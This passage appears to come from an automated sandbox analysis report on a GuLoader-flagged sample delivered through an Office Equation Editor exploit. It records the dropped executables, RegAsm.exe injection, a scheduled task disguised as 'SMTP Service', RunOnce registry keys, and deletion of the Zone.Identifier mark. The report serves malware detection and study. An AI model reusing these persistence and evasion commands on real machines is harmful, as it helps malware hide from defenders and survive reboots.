      Source: C:\Users\Public\69577.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp'
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp80F5.tmp'
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: .pdb< source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: ystem.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb9FFP source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: !symbols\dll\System.pdb source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: System.pdb H~t source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: nWindows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\dll\System.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: WT3UpC:\Windows\System.pdb source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: < indows\RegAsm.pdbpdbAsm.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: < indows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb\cs source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: RegAsm.pdb source: smtpsvc.exe, smtpsvc.exe.6.dr
      Source: Binary string: !C:\Windows\System.pdb@= source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: Wm.pdb source: RegAsm.exe, 00000006.00000002.2383056342.00000000203CD000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\symbols\dll\System.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: System.pdb source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
      Source: Binary string: System.pdb8 source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
      Source: Binary string: mscorrc.pdb source: RegAsm.exe, 00000006.00000002.2371259124.00000000000D0000.00000002.00000001.sdmp
      Source: Binary string: C:\Windows\System.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_1E370FAA push ds; retn 0024h
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_1E370FF6 push ds; retn 0020h
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txtJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Users\user\subfolder1\filename1.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txtJump to dropped file

      Boot Survival:

      barindex
      Drops PE files to the user root directoryShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
      Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp'
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier read attributes | delete
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\69577.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
